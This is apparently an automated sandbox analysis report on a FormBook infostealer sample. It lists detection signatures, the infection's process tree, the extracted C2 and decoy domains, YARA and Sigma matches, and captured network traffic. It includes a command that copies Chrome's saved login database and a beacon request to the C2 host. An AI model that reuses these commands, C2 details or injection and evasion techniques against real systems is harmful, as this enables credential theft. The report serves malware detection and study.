Play interactive tour

Edit tour

Analysis Report f97e137e_by_Libranalysis

Overview

General Information

Sample Name:	f97e137e_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:	403818
MD5:	f97e137e249bb393fd88b7dec1ddf9a2
SHA1:	09e3865d681b8670aa9a1ef184c06ca40927d94c
SHA256:	2f2c77d7bcd0fbf80b63b7b2e60b8192130c285bce2f946f021dee83954254e6
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Benign windows process drops PE files

Detected FormBook malware

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: Steal Google chrome login data

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Creates a thread in another existing process (thread injection)

Creates an undocumented autostart registry key

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: System File Execution Location Anomaly

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Uses ipconfig to lookup or modify the Windows network settings

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

f97e137e_by_Libranalysis.exe (PID: 6944 cmdline: 'C:\Users\user\Desktop\f97e137e_by_Libranalysis.exe' MD5: F97E137E249BB393FD88B7DEC1DDF9A2)

secinit.exe (PID: 4112 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

ipconfig.exe (PID: 1904 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)

cmd.exe (PID: 5544 cmdline: /c del 'C:\Windows\SysWOW64\secinit.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 3788 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

vp21b7dsh.exe (PID: 2188 cmdline: C:\Program Files (x86)\Adrldefcp\vp21b7dsh.exe MD5: 174A363BB5A2D88B224546C15DD10906)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.joomlas123.info/3nop/"], "decoy": ["bakecakesandmore.com", "shenglisuoye.com", "chinapopfactory.com", "ynlrhd.com", "liqourforyou.com", "leonqamil.com", "meccafon.com", "online-marketing-strategie.biz", "rbfxi.com", "frseyb.info", "leyu91.com", "hotsmail.today", "beepot.tech", "dunaemmetmobility.com", "sixpenceworkshop.com", "incrediblefavorcoaching.com", "pofo.info", "yanshudaili.com", "yellowbrickwedding.com", "paintpartyblueprint.com", "capricorn1967.com", "meucarrapicho.com", "41230793.net", "yoghurtberry.com", "wv0uoagz0yr.biz", "yfjbupes.com", "mindfulinthemadness.com", "deloslifesciences.com", "adokristal.com", "vandergardetuinmeubelshop.com", "janewagtus.com", "cloudmorning.com", "foresteryt01.com", "accident-law-yer.info", "divorcerefinance.guru", "wenxiban.com", "589man.com", "rockerdwe.com", "duftkerzen.info", "igametalent.com", "yoursafetraffictoupdates.review", "jialingjiangpubu.com", "maximscrapbooking.com", "20sf.info", "shadowlandswitchery.com", "pmbnc.info", "shoppingdrift.online", "potashdragon.com", "ubkswmpes.com", "064ewj.info", "rewsales.com", "dealsforyou.tech", "ziruixu.com", "naehascloud.com", "smokvape.faith", "sunflowermoonstudio.com", "stepgentertainment.com", "tawbj.info", "besthappybuds.net", "koohshoping.com", "ajikrentcarsurabaya.com", "jkjohnsroofingfl.com", "whatsnexttnd.com", "yoyodvd.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.secinit.exe.10410000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.secinit.exe.10410000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.secinit.exe.10410000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17649:$sqlite3step: 68 34 1C 7B E1 0x1775c:$sqlite3step: 68 34 1C 7B E1 0x17678:$sqlite3text: 68 38 2A 90 C5 0x1779d:$sqlite3text: 68 38 2A 90 C5 0x1768b:$sqlite3blob: 68 53 D8 7F 8C 0x177b3:$sqlite3blob: 68 53 D8 7F 8C
2.2.secinit.exe.10410000.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.secinit.exe.10410000.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.secinit.exe.10410000.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18449:$sqlite3step: 68 34 1C 7B E1 0x1855c:$sqlite3step: 68 34 1C 7B E1 0x18478:$sqlite3text: 68 38 2A 90 C5 0x1859d:$sqlite3text: 68 38 2A 90 C5 0x1848b:$sqlite3blob: 68 53 D8 7F 8C 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: System File Execution Location Anomaly

Show sources

Source: Process started

Author: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:\Windows\System32\secinit.exe, ParentImage: C:\Windows\SysWOW64\secinit.exe, ParentProcessId: 4112, ProcessCommandLine: , ProcessId: 3424

Stealing of Sensitive Information:

Sigma detected: Steal Google chrome login data

Show sources

Source: Process started

Author: Joe Security: Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\ipconfig.exe, ParentImage: C:\Windows\SysWOW64\ipconfig.exe, ParentProcessId: 1904, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 3788

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: f97e137e_by_Libranalysis.exe

Avira: detected

Found malware configuration

Show sources

Source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.joomlas123.info/3nop/"], "decoy": ["bakecakesandmore.com", "shenglisuoye.com", "chinapopfactory.com", "ynlrhd.com", "liqourforyou.com", "leonqamil.com", "meccafon.com", "online-marketing-strategie.biz", "rbfxi.com", "frseyb.info", "leyu91.com", "hotsmail.today", "beepot.tech", "dunaemmetmobility.com", "sixpenceworkshop.com", "incrediblefavorcoaching.com", "pofo.info", "yanshudaili.com", "yellowbrickwedding.com", "paintpartyblueprint.com", "capricorn1967.com", "meucarrapicho.com", "41230793.net", "yoghurtberry.com", "wv0uoagz0yr.biz", "yfjbupes.com", "mindfulinthemadness.com", "deloslifesciences.com", "adokristal.com", "vandergardetuinmeubelshop.com", "janewagtus.com", "cloudmorning.com", "foresteryt01.com", "accident-law-yer.info", "divorcerefinance.guru", "wenxiban.com", "589man.com", "rockerdwe.com", "duftkerzen.info", "igametalent.com", "yoursafetraffictoupdates.review", "jialingjiangpubu.com", "maximscrapbooking.com", "20sf.info", "shadowlandswitchery.com", "pmbnc.info", "shoppingdrift.online", "potashdragon.com", "ubkswmpes.com", "064ewj.info", "rewsales.com", "dealsforyou.tech", "ziruixu.com", "naehascloud.com", "smokvape.faith", "sunflowermoonstudio.com", "stepgentertainment.com", "tawbj.info", "besthappybuds.net", "koohshoping.com", "ajikrentcarsurabaya.com", "jkjohnsroofingfl.com", "whatsnexttnd.com", "yoyodvd.com"]}

Multi AV Scanner detection for domain / URL

Show sources

Source: www.joomlas123.info	Virustotal: Detection: 10%			Perma Link
Source: www.joomlas123.info/3nop/	Virustotal: Detection: 13%			Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: f97e137e_by_Libranalysis.exe	Virustotal: Detection: 26%			Perma Link
Source: f97e137e_by_Libranalysis.exe	ReversingLabs: Detection: 29%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.741027971.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740071710.00000000034A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.920186437.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921108126.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.921236499.0000000000820000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.740236914.00000000034E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.secinit.exe.10410000.5.raw.unpack, type: UNPACKEDPE

Source: 2.2.secinit.exe.10410000.5.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: f97e137e_by_Libranalysis.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source: unknown

HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49739 version: TLS 1.2

Source:	Binary string: ipconfig.pdb source: secinit.exe, 00000002.00000002.740453130.00000000037D0000.00000040.00000001.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: secinit.exe, 00000002.00000002.740453130.00000000037D0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.707712368.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: secinit.pdbGCTL source: ipconfig.exe, 0000000A.00000002.923122934.000000000329F000.00000004.00000001.sdmp, vp21b7dsh.exe, 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, vp21b7dsh.exe.3.dr
Source:	Binary string: wntdll.pdbUGP source: secinit.exe, 00000002.00000002.740721530.000000000393F000.00000040.00000001.sdmp, ipconfig.exe, 0000000A.00000002.921585354.0000000000C7F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: secinit.exe, ipconfig.exe
Source:	Binary string: secinit.pdb source: ipconfig.exe, 0000000A.00000002.923122934.000000000329F000.00000004.00000001.sdmp, vp21b7dsh.exe, vp21b7dsh.exe.3.dr
Source:	Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.707712368.0000000005A00000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\secinit.exe	Code function: 4x nop then pop ebx	2_2_10417AD0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 4x nop then pop edi	2_2_1041E58F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop ebx	10_2_00157AD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop edi	10_2_00166D61
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then pop edi	10_2_0015E58F

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.joomlas123.info/3nop/

Source: global traffic

HTTP traffic detected: GET /3nop/?_jRpk=/jKrXDLhwFwVj1hFId1WQEYyM5S3d1Wgn3KOa2+OoCVdAn90Sq0F1OzLpOoR28nrdMHB&ofrxU8=xVMtBJ50 HTTP/1.1Host: www.joomlas123.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 199.192.24.139 199.192.24.139
Source: Joe Sandbox View	IP Address: 162.159.134.233 162.159.134.233

Source: Joe Sandbox View

ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 May 2021 10:34:10 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 328Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 33 6e 6f 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3nop/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: explorer.exe, 00000003.00000002.922678107.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: f97e137e_by_Libranalysis.exe, 00000000.00000003.653927985.0000000000799000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000003.00000000.715743152.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
